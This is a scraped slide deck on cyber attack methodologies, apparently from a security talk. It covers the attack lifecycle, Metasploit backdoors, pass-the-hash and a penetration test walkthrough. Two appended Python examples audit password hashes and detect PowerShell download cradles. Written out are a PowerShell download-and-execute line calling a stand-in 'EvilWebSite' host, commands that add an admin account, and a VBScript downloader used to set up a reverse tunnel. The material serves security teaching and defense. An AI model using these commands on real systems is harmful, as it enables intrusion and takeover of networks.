PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 
Final report ethical hacking
Final report ethical hackingFinal report ethical hacking
Final report ethical hackingsamprada123
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionWayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
certified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfcertified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfinfosec train
 
certified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentcertified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentpriyanshamadhwal2
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network SecurityHarish Chaudhary
 

Similaire à Cyber Attack Methodologies (20)

Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
Wajug: Cyber war, Cyber Attacks and Ethical Hacking - Frédéric de Pauw - Dece...
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Cse ethical hacking ppt
Cse ethical hacking pptCse ethical hacking ppt
Cse ethical hacking ppt
 
Mim Attack Essay
Mim Attack EssayMim Attack Essay
Mim Attack Essay
 
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary ReadingThe Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
The Cyber Kill Chain. 7 Stages of Cyber Kill Chain Supplementary Reading
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
3 Hkcert Trend
3  Hkcert Trend3  Hkcert Trend
3 Hkcert Trend
 
Introduction To Information Security
Introduction To Information SecurityIntroduction To Information Security
Introduction To Information Security
 
Event - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security PerimetersEvent - Internet Thailand - Total Security Perimeters
Event - Internet Thailand - Total Security Perimeters
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
NetWitness
NetWitnessNetWitness
NetWitness
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Final report ethical hacking
Final report ethical hackingFinal report ethical hacking
Final report ethical hacking
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
certified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdfcertified-ethical-hacker-cehv12_course_content.pdf
certified-ethical-hacker-cehv12_course_content.pdf
 
certified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_contentcertified-ethical-hacker-cehv12_course_content
certified-ethical-hacker-cehv12_course_content
 
01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security01_Metasploit - The Elixir of Network Security
01_Metasploit - The Elixir of Network Security
 

Cyber Attack Methodologies

  • 2. 1. Objectives 2. Introduction 3. Cyber Attack Lifecycle 4. Vulnerabilities and Exploitation 5. Social Engineering and Advanced Persistent Threats 6. Example of a penetration test scenario 7. Conclusion
  • 4. Introduction
      - Frédéric De Pauw
      - Cyber Security specialist & ethical hacker
          - Head Security Services @NRB
          - Freelance Ethical Hacker (BE – LUX – US)
          - https://be.linkedin.com/in/fdepauw
  • 5. Introduction
      - What is Cyber Crime?
          - Computer crime, or cybercrime, is crime that involves a computer and a network
      - Two types of Cyber Crime:
          - Technology is the Target: enterprise, state systems, personal systems
          - Technology is the Instrument: criminal activities on the Internet
      - This session is focused on the first type
  • 6. Introduction
      - Technology = Target: Distributed Denial of Service, Hacking, Malware, Ransomware, Phishing, Hacktivism, …
      - Technology = Instrument: Pedopornography, Incitement to racial hatred, Incitement to terrorism, Money Laundering, Drug sales, Spam, …
  • 7. Introduction
      - Cyber Crime
          - Has evolved drastically over the past years, following the global evolution of ICT supporting human activity
          - Allows cyber criminals to make profits equivalent to other types of criminality
          - Offers some advantages over other criminal activities: anonymity, discretion, borderlessness
          - Remains little fought, with no international legislation
          - Has evolved to cyber war with state-sponsored attacks
          - Will affect our lives (connected cars, Operational Technologies, IoT)
          - Cost of Cyber Crime in Belgium: 3,5 billion Euros
  • 8. Introduction Evolution of Cyber Crime
      - [Figure: sophistication of cyber crime over time, from 1985-1995 to 2010-2017-…; labels: Entertainment, First Worms, Phone Hacking, Hacktivism, Virus Spread, Website Defacement, Organized Crime, DDoS, Company Systems Hacking, Data Leak, Industrial Espionage, Cyber War, Targeted Attacks, State-Sponsored Attacks]
  • 9. Introduction Cyber War – NSA Hacking Tools Leak (2017)
      1. NSA contractor has NSA hacking tools on his PC
      2. NSA contractor installs a trojan
      3. NSA contractor runs a full scan
      4. Kaspersky AV discovers malware + NSA hacking tools
      5. Russian spies are somehow aware of the discovery of NSA tools (Kaspersky denies giving info)
      6. Russian spies further hack the contractor's PC
  • 10. Introduction Cyber War – NSA Hacking Tools Leak
  • 11. Introduction
      - Future of Cyber Crime
          - Intensification of targeted cyber attacks against enterprises with important impacts (financial, image..)
          - Predominance of Advanced Persistent Threats targeting the end user
          - 99% of system compromises will still use unpatched vulnerabilities
          - Intensification of cyber war / cyber espionage activities between nations
          - Increase of cyber crime targeting connected objects and operational technologies
              - Mirai botnet – 2017
              - Hackable cardiac devices – 2017
              - WIFI Baby Heat Monitor device – 2017
              - Jeep SUV hack – 2015
  • 12. Introduction
      - Legal evolution
          - General Data Protection Regulation (GDPR) – adopted end of 2016 – comes into force 25 May 2018
          - Circulars of the National Bank of Belgium
              - Regulation for the financial sector
          - Data breach notification standard
              - Within 72 hours
          - Fines in case of data leak
              - Max 4% of turnover, maximum 20 M€
  • 14. Cyber Attack Lifecycle
      1. Reconnaissance: Public Information, Social Networks, Vulnerability Scanning, Physical Observation
      2. Initial Infection: Vulnerabilities, Virus / Malware, Social Engineering, Physical Intrusion
      3. Gain Control: Control infected system
      4. Privilege Escalation: Gain elevated privileges on the infected system
      5. Lateral Movement: Compromise more systems deeper in the network
      6. Persistence: Maintain persistent connection with infected systems
      7. Malicious Activities: Data Exfiltration, Hacking Websites, Money Extortion, ..
  • 15. Cyber Attack Lifecycle > Reconnaissance
      - The reconnaissance process is a key activity
          - During this phase, crucial information is obtained in order to perform a cyber attack
          - For instance, the information will be used to determine the best attack vector
      - Activities performed are:
          - Collect information concerning the target (websites, telephone numbers, general mailboxes..) through public information
          - Collect information through direct contact such as phone calls (fake poll, job seeker..)
          - Collect technical information concerning the target information system (exposed systems, partners, data centers..)
          - Collect information on premises (garbage, WIFI scanning..)
          - Actively scan enterprise networks exposed on the Internet
  • 16. Cyber Attack Lifecycle > Reconnaissance
  • 17. Cyber Attack Lifecycle > Reconnaissance
      - Following reconnaissance activities, attackers must have obtained enough information to determine the best attack vectors for the initial infection phase
      - For instance:
          - Vulnerabilities affecting systems exposed on the Internet
          - Lack of physical access to facilities
          - Social engineering attack on selected profiles from, for instance, social network information
  • 18. Cyber Attack Lifecycle > Initial Infection
      - Initial Infection is aimed at obtaining a first backdoor within the target information system
      - Vectors:
          - Exploiting a vulnerability affecting the victim’s system(s)
          - Infection through Virus / Malware
          - Exploiting a physical vulnerability
  • 19. Cyber Attack Lifecycle > Initial Infection
      - [Diagram: Perimeter, Public Cloud, Private Cloud, Corporate Network, On Prem, End Users; each zone holds applications (SaaS or corporate), Servers / Appliances and Security Technology]
  • 20. Cyber Attack Lifecycle > Initial Infection
  • 21. Cyber Attack Lifecycle > Initial Infection
      - IDS/IPS Bypass
          - Encryption
      - Anti-Virus Bypass
          - Use simple PowerShell as a dropper which fetches an encrypted payload over the Internet
          - powershell.exe "IEX ((new-object net.webclient).downloadstring('http://EvilWebSite/payload.txt '))
          - Unknown viruses
          - Use staging to decouple the payload from the initial dropper
          - The dropper is injected directly into memory
          - Fileless malware infection
      - Firewall Bypass
          - Uses “reverse” connections which connect to the C&C
          - E.g. HTTPS passing through the Enterprise Proxy
  • 22. Cyber Attack Lifecycle > Initial Infection
      - Metasploit + SET (Social Engineering Toolkit)
          - Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server
          - Create PowerShell payload
  • 23. Cyber Attack Lifecycle > Initial Infection
      - Metasploit + SET (Social Engineering Toolkit)
          - Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server
          - Move payload to evil web server
  • 24. Cyber Attack Lifecycle > Initial Infection
      - Metasploit + SET (Social Engineering Toolkit)
          - Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server
          - Create the « Dropper »
  • 25. Cyber Attack Lifecycle > Initial Infection
      - Metasploit + SET (Social Engineering Toolkit)
          - Create a Meterpreter backdoor using SET for the payload and Metasploit for the C&C server
          - Start the listener
  • 26. Cyber Attack Lifecycle > Gain Control
      - Once the initial infection is performed, the objective is to get control over the machine
      - For this, a network connection must be established between the victim and the Command & Control server
      - In general, a « reverse » connection is made to bypass inbound firewall protection
      - Several techniques exist to bypass outbound filtering (if present)
  • 27. Cyber Attack Lifecycle > Gain Control
      - Standard enterprise security principles for outbound filtering:
          - Default policy is to deny all outbound connections
          - Allowed outbound connections must go through a proxy
          - Outbound connections must conform to the expected protocol
          - Outbound connections must pass other checks as well
      - Examples of outbound filtering evasion techniques
          - Reverse HTTP and / or HTTPS traffic (without or with proxy settings verification)
          - Payload staging over DNS by setting the payload into TXT records of a domain
  • 28. Cyber Attack Lifecycle > Gain Control
      - Metasploit / Meterpreter
          - Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
  • 29. Cyber Attack Lifecycle > Privilege Escalation
      - Escalate privileges from infected machines in order to gain elevated access
      - Typical example is getting Administrator privileges
      - Several techniques
          - « Local Exploits » from local applications on the infected machine
          - Manual search for credentials in scripts
          - Password hashes dump (e.g. SAM, /etc/passwd) and cracking
          - Authenticated sessions grabbing (e.g. VPN sessions)
          - LSASS process dump (Mimikatz)
          - SSH keys
          - World-writable files
          - Read command history files
          - Batches / jobs alteration
      - Process Injection
          - Try injecting malicious code in processes running under a « Domain Admin » privileged user
  • 30. Cyber Attack Lifecycle > Privilege Escalation
      - Metasploit: « Incognito » module
          - Allows impersonating authentication tokens on compromised Windows hosts
          - Backdoor must run under « SYSTEM » or « Administrator » privilege in order to see interesting authentication tokens
          - TIP: File servers are virtual treasure troves of tokens since most file servers are used as network attached drives via domain logon scripts
  • 31. Cyber Attack Lifecycle > Lateral Movement
      - From infected systems, try to infect more systems deeper in the network
      - Basically repeat the Cyber Attack Lifecycle process (recon, initial infection, privilege escalation…)
      - Aim for high value systems: Windows domain controllers, file servers..
      - Techniques
          - Credential re-use / pass-the-hash / SSH keys re-use
          - Internal application vulnerabilities (less often patched)
          - Network segmentation issues between environments (e.g. port 445) – PsExec with Pass-The-Hash
  • 32. Cyber Attack Lifecycle > Lateral Movement
      - Metasploit – Pivoting technique
          - Basically using the first compromise to allow and even aid in the compromise of other, otherwise inaccessible systems
  • 33. Cyber Attack Lifecycle > Lateral Movement
      - Metasploit – Pivoting technique
          - Use Autoroute to make the compromised host a pivot to other networks
  • 34. Cyber Attack Lifecycle > Lateral Movement
      - Metasploit – Pivoting technique
          - Scan the network through the route created on ports 139 & 445
  • 35. Cyber Attack Lifecycle > Lateral Movement
      - Metasploit – Pivoting technique
          - Start a new session on a new host using PsExec and the “Pass-The-Hash” technique, re-using the local Administrator password hash
  • 36. Cyber Attack Lifecycle > Maintain Persistence
      - Prevent loss of connection between infected machines and the C&C
      - Techniques
          - Create jobs / scheduled tasks
          - Create a service running on startup
          - Use AppInit DLLs (disabled in Windows 8 with Secure Boot enabled)
          - Bootkit / Rootkit
          - Default file association
          - Logon scripts
          - Modification of applications / services
          - Registry RUN keys
  • 37. Cyber Attack Lifecycle > Maintain Persistence
      - Metasploit / Persistence module
          - Create a Meterpreter service which will start when the compromised host boots
  • 38. Cyber Attack Lifecycle > Maintain Persistence
      - Metasploit / Persistence module
          - Create a Meterpreter service which will start when the compromised host boots
  • 39. Cyber Attack Lifecycle > Demo
      - Social Engineering scenario
          - Send a « Virus » to the victim which consists of a Metasploit Meterpreter instance
          - Undetected by up-to-date commercial antivirus
      - Steps:
          1. Prepare malware & environment
          2. Send malware
          3. Execute malware
          4. Get infected & contact C&C
          5. Interact
  • 41. Vulnerabilities and Exploitation
      - A vulnerability is a flaw in a system which allows a malicious user to compromise its confidentiality, integrity and / or availability
          - Simple – default password. Complex – buffer overflow in an application
      - Dozens of new vulnerabilities are officially classified every day
          - http://www.cvedetails.com
      - Dozens of others are not disclosed!
          - 0DAY – vulnerabilities not discovered, or not disclosed
      - Vulnerabilities are discovered by
          - Researchers, students (Ethical Hackers)
          - Professional researchers (Vulnerability Brokers)
          - http://www.zerodayinitiative.com/
          - France – Vupen Security – sells vulnerabilities to NASA
          - Cyber criminals (0DAYS)
  • 42. Vulnerabilities and Exploitation
      - Full Disclosure principle
          - Vulnerabilities are reported and published publicly as soon as discovered, without taking into account whether a patch is available
      - Responsible Disclosure principle
          - Vendors are notified first
          - Vulnerability is publicly disclosed after 45 days
      - Websites with vulnerabilities and associated exploits
          - www.securityfocus.com
          - www.1337day.com (not free)
          - http://www.cvedetails.com/
          - http://www.exploit-db.com/
          - Underground websites on the TOR network
      - Conferences: defcon.org (US), brucon.be (BE), hack.lu (LU), hackitoergosum.org (FR), ccc.de (ALL), blackhat.com (US)
  • 44. Vulnerabilities and Exploitation
      - Complexity of systems, application code, communication flows, network segmentation
      - Out-of-the-box vulnerabilities of vendor solutions, lack of security configuration
          - Next->Next->Next syndrome
      - Lack of secure coding awareness
          - TOP 10 OWASP
      - Lack of enforcement for security during IT projects
          - Security implies cost and time
      - Need for functionality <-> Need for security
          - Blacklist mode
          - Learning mode
  • 45. Social Engineering and Advanced Persistent Threats
  • 46. Human Vulnerabilities / Social Engineering
      - Social engineering is the preferred attack vector, as it generally makes it easier to bypass preventive security measures
      - Targets can be the company's employees but also partners / subcontractors
      - Two types of social engineering:
          - Human SE
          - Technical SE
  • 47. Human Vulnerabilities / Social Engineering
      - Technical SE is aimed at compromising end user systems
      - Transmission of the malware follows « authorized » routes, such as e-mail and/or web browsing
      - Bypasses security measures such as perimeter security, firewalls,..
      - [Diagram: 1. INFECTION, 2. CONTROL]
  • 48. Human Vulnerabilities / Social Engineering
      - Attack methodologies:
          - Encourage users to install tools such as « TeamViewer » or « LogMeIn »
          - Send malware through e-mail
              - Word/Excel with malicious macros
              - PDF files exploiting PDF vulnerabilities
          - Send mail containing links to malicious web sites
          - Send phishing SMS to smartphones (SMShing)
          - Drop USB keys containing viruses (STUXNET)
          - USB gadgets configured to simulate a keyboard
  • 49. Human Vulnerabilities / Social Engineering
      - USB Gadgets
          - Nowadays systems are in general protected against USB infection through the autorun functionality
          - New method -> « Hacker Interface Devices »
          - Attackers embed malicious code within USB gadgets
          - Once connected, those gadgets simulate being a keyboard and start sending commands to the computer (Keystroke Injection)
          - Those commands can drop malware as easily as other techniques
          - Ref: http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
  • 51. Penetration test example
      - Context: Black Box intrusion test
      - Scope: external-facing systems
      - [Diagram: Web Servers, ports 80 (HTTP) and 443 (HTTPS); DMZ; Intranet; Enterprise Windows Domain; Internal Network]
  • 52. Penetration test example
      - VULN 1/2: Vulnerable deployment of SAP BO (Apache Axis2)
          - CVE-2010-0219, Apache Axis2 Default Credentials
          - http://www.securityfocus.com/bid/40343, Apache Axis2 Directory Traversal
      - See earlier: Vuln « Directory Traversal », Vuln « Default Password »
      - Allows obtaining admin credentials to Axis2
  • 54. Penetration test example
      - Access to Axis2 administration allows uploading a Web Service and deploying it LIVE
  • 55. Penetration test example
      - A Metasploit module exists to exploit this vulnerability: Axis2 / SAP BusinessObjects Authenticated Code Execution
          - http://www.rapid7.com/db/modules/exploit/multi/http/axis2_deployer
      - We use it to deploy a reverse shell backdoor on the server to connect back to port 80
      - VULN 3: Servers are allowed to contact any host on the Internet on ports 80 and 443
      - [Diagram: Web Servers, ports 80 (HTTP) and 443 (HTTPS); DMZ; Intranet; Enterprise Windows Domain; Internal Network; C&C SERVER – PORT 80]
  • 56. Penetration test example
      - Not possible to upload a Meterpreter (killed by AV on the machine)
      - Possible to upload a backdoor which sends me back a DOS command prompt on the server
  • 57. Penetration test example
      - Next steps: create a privileged account on the server
      - VULN 4: Application server is running under ADMIN privileges
          - Net user temptest password /add
          - Net localgroup Administrators hacked /add
      - Obtain a Remote Desktop connection
          - Problem: port 3389 closed inbound
          - Solution: create a reverse SSH tunnel with reverse port-forwarding on port 3389
      - [Diagram: Web Servers, port 3389; C&C SERVER – PORT 80; SSH SERVER – PORT 443; reverse SSH tunnel / port 443]
  • 58. Penetration test example
      - To create the tunnel, I need to download an SSH client on the server using the DOS command prompt
      - I create a VBScript script using the « Echo » command, then execute it
          Echo dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") >> dl.vbs
          Cscript dl.vbs
      - Use plink to create the tunnel
          dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
          dim bStrm: Set bStrm = createobject("Adodb.Stream")
          xHttp.Open "GET", "http://www.putty.com/plink.exe", False
          xHttp.Send
          with bStrm
              .type = 1 '//binary
              .open
              .write xHttp.responseBody
              .savetofile "c:\temp\plink.exe", 2 '//overwrite
          end with
  • 59. Penetration test example
      - Connect to RDP through the tunnel and use the user account I just created to connect (temptest / password)
      - [Diagram: Web Servers, port 3389; C&C SERVER – PORT 80; SSH SERVER – PORT 443; reverse SSH tunnel / port 443]
  • 60. Penetration test example
      - Next step -> Lateral Movement: the simplest first, credential reuse
      - I need to crack all passwords present locally on the infected server
      - Vuln 6/7: Windows 2003 design vulnerabilities
          - VULN 6: « Repair » file contains a SAM backup file containing encrypted credentials using LMHASH
          - VULN: LMHASH encryption algorithm is broken and can be cracked easily
  • 61. Penetration test example
      - After some minutes
  • 62. Penetration test example
      - VULN 8: Local Administrator password is replicated over all systems in the DMZ
      - [Diagram: several Web Servers, port 3389; C&C SERVER – PORT 80; SSH SERVER – PORT 443; reverse SSH tunnel / port 443]
  • 63. Penetration test example
      - Next step: try to hit the internal network
      - VULN 9: DMZ systems are members of the internal Windows domain. This means that critical ports (e.g. 139, 445, …) must be open between the DMZ and the internal network
      - VULN 10: Password Replication Bis – a Domain Admin user account whose name is identical to a local account has the same password
  • 64. Penetration test example
      - I connect to the Domain Controller from the DMZ using the Domain Admin account. I am now Domain Administrator and have full control over the Enterprise Domain
      - [Diagram: Web Servers, ports 80 (HTTP) and 443 (HTTPS); DMZ; Intranet; Enterprise Windows Domain; Domain Controller]
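
The penetration test above turns on two credential weaknesses: LM hashes kept in the SAM backup (VULN 6) and one password shared across DMZ hosts and between a local and a domain account (VULN 8, VULN 10). The Python audit below is an added example, not part of the slides; it assumes pwdump-style `user:RID:LM:NT:::` lines, and all host names, account names and hash values in it are constructed.

```python
"""Credential-hygiene audit over pwdump-style dumps (constructed sample data)."""
import re
from collections import defaultdict
from typing import NamedTuple

# Well-known constants: the LM and NT hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_LM_HALF = EMPTY_LM[:16]  # LM hashes each 7-character half separately
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
HEX32 = re.compile(r"[0-9a-f]{32}")


class Account(NamedTuple):
    host: str
    user: str
    rid: int
    lm: str  # "" when no usable LM hash is stored
    nt: str  # "" when the NT field is missing or malformed


def parse_pwdump(host, text):
    """Parse `user:RID:LM:NT:::` lines collected from one host or domain."""
    accounts = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue  # skip blank or malformed lines
        lm, nt = parts[2].lower(), parts[3].lower()
        # Some tools print "NO PASSWORD***" instead of a hash: treat it as absent.
        lm = lm if HEX32.fullmatch(lm) and lm != EMPTY_LM else ""
        nt = nt if HEX32.fullmatch(nt) else ""
        accounts.append(Account(host, parts[0], int(parts[1]), lm, nt))
    return accounts


def lm_findings(accounts):
    """Accounts that still store an LM hash.

    The boolean is True when the second half is the empty-half constant,
    which means the password has 7 characters or fewer.
    """
    return [(a.host, a.user, a.lm[16:] == EMPTY_LM_HALF) for a in accounts if a.lm]


def shared_passwords(accounts):
    """NT hashes are unsalted, so equal hashes on different hosts mean equal passwords."""
    by_nt = defaultdict(set)
    for a in accounts:
        if a.nt and a.nt != EMPTY_NT:
            by_nt[a.nt].add((a.host, a.user))
    return {nt: sorted(owners) for nt, owners in by_nt.items()
            if len({host for host, _ in owners}) > 1}


def audit(dumps):
    """dumps maps a host or domain name to its pwdump-style text."""
    accounts = [a for host, text in dumps.items() for a in parse_pwdump(host, text)]
    return lm_findings(accounts), shared_passwords(accounts)


# Constructed sample: three DMZ hosts and one domain export (fake hash values).
LM_A, NT_A = "c1" * 16, "d1" * 16
NT_B, NT_C = "e1" * 16, "f1" * 16
SAMPLE_DUMPS = {
    "dmz-web01": "\n".join([
        f"Administrator:500:{LM_A}:{NT_A}:::",
        f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
        f"svc_app:1003:{'b2' * 8}{EMPTY_LM_HALF}:{NT_B}:::",
    ]),
    "dmz-web02": f"Administrator:500:{LM_A}:{NT_A}:::",
    "dmz-web03": f"Administrator:500:NO PASSWORD*********************:{NT_C}:::",
    "corp-domain": f"svc_app:1105:{EMPTY_LM}:{NT_B}:::",
}

if __name__ == "__main__":
    lm, shared = audit(SAMPLE_DUMPS)
    for host, user, short in lm:
        note = " (password is 7 characters or fewer)" if short else ""
        print(f"LM hash stored: {host}\\{user}{note}")
    for owners in shared.values():
        print("Same password:", ", ".join(f"{h}\\{u}" for h, u in owners))
```

Each finding maps to a fix: disable LM hash storage and rotate the affected passwords, and give every host a unique local Administrator password that no domain account shares.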
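
Slide 21 shows a PowerShell one-liner that downloads a payload and runs it in memory, which leaves little on disk for anti-virus to inspect. As an added example (not part of the slides), this Python detector flags that pattern in process-creation records, including when the command is passed Base64-encoded; the event field names and the sample records are constructed.

```python
"""Flag PowerShell download-and-execute command lines in process-creation events."""
import base64
import re

POWERSHELL = re.compile(r"(?:^|[\\/])(?:powershell|pwsh)(?:\.exe)?$", re.I)
DOWNLOAD = re.compile(
    r"downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b", re.I)
EXECUTE = re.compile(r"\biex\b|invoke-expression", re.I)
# PowerShell accepts abbreviations of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED = re.compile(r"(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand argument (Base64 of UTF-16LE), or ""."""
    match = ENCODED.search(cmdline)
    if not match:
        return ""
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers bad Base64 and bad UTF-16 alike
        return ""


def classify(image, cmdline):
    """Return a verdict for one process-creation record, or None if benign."""
    if not POWERSHELL.search(image):
        return None
    # Inspect the visible command line and any decoded payload together.
    text = cmdline + " " + decode_encoded_command(cmdline)
    downloads = bool(DOWNLOAD.search(text))
    executes = bool(EXECUTE.search(text))
    if downloads and executes:
        return "download-and-execute"  # content fetched and run in memory
    if downloads:
        return "download-only"         # lower severity: review the source URL
    return None


def scan(events):
    """Return (host, pid, verdict) for every flagged event, in input order."""
    hits = []
    for event in events:
        verdict = classify(event["image"], event["cmdline"])
        if verdict:
            hits.append((event["host"], event["pid"], verdict))
    return hits


# Constructed sample records; the URL is the placeholder used on slide 21.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://EvilWebSite/payload.txt')"
_ENCODED_ARG = base64.b64encode(_CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"host": "dmz-web01", "pid": 4312, "image": PS,
     "cmdline": "powershell.exe \"IEX ((new-object net.webclient)"
                ".downloadstring('http://EvilWebSite/payload.txt'))\""},
    {"host": "ws-003", "pid": 1188, "image": PS,
     "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                "-File C:\\Scripts\\backup.ps1"},
    {"host": "ws-042", "pid": 7720, "image": PS,
     "cmdline": "powershell.exe -NoProfile -enc " + _ENCODED_ARG},
    {"host": "ws-017", "pid": 2096, "image": PS,
     "cmdline": "powershell.exe Invoke-WebRequest -Uri https://intranet.example/agent.msi "
                "-OutFile C:\\Temp\\agent.msi"},
    {"host": "ws-017", "pid": 2100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c echo iex downloadstring"},
]

if __name__ == "__main__":
    for host, pid, verdict in scan(SAMPLE_EVENTS):
        print(f"{host} pid={pid}: {verdict}")
```

String matching of this kind is a first-pass filter; PowerShell script block logging records the code that actually ran and is the stronger data source.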